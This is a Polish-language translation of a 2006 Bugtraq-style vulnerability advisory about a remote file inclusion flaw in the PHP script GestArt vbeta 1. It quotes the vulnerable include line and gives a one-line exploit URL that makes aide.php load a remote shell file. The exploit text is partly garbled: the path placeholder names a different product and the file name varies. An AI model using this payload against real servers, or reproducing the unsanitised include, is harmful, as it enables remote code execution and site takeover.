|
Polskie tłumaczenie bugtraqu
| Przetłumaczył: | kiero | | Temat artykułu: | GestArt <= vbeta 1 Podatności zdalnego włączenia zawartości pliku | | Źródło: | http://www.securityfocus.com/archive/1/449887/30/30/threaded | | Podatne wersje: | <= vbeta 1 | | Data publikacji: | 2006-10-30 21:20:50 | | Czytano: | 2715 razy |
GestArt <= vbeta 1 Podatności zdalnego włączenia zawartości pliku
Znaleziony przez : CoLd Zero [ Wasem898 ]
Palestine Muslim Hacker's
Kod : include("$4AZHAR.Team")
######################################################
#
# [ GestArt vbeta 1]
#
# Rodzaj: Podatności zdalnego włączenia zawartości pliku
# Opublikowany 2006-10-25
# Zdalny: Tak
# Ryzyko : Niebiezpieczne
# Strona: http://www.comscripts.com/scripts/php.gestart.642.html
# Autor: Cold Zero
# Kontakt: ip.123.456.78.90 (at) hotmail (dot) com [email ukryty]
#
######################################################
plik ;
/gestArt/aide.php
======================================================
Podatny kod:
<? include("$aide.txt");?>
=======================================================
Exploit :
Http:// www.Victem.0 / [WM-News_path[
/gestArt/aide.php3?aide=http://ColdZero-Shell.txt?
---- Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [Root Shell]
[o0xxdark0o] ]organza[ [Huge] [H@MliT]
---- Podziękowania: wszystkim członkom www.4azhar.Com
Kontakt : ip.123.456.78.90 (at) hotmail (dot) com [email ukryty]
Strona : WWW.4AZHAR.COM
--------------------------------------|| Viva Palestine
||----------------------------------------- |
|
|
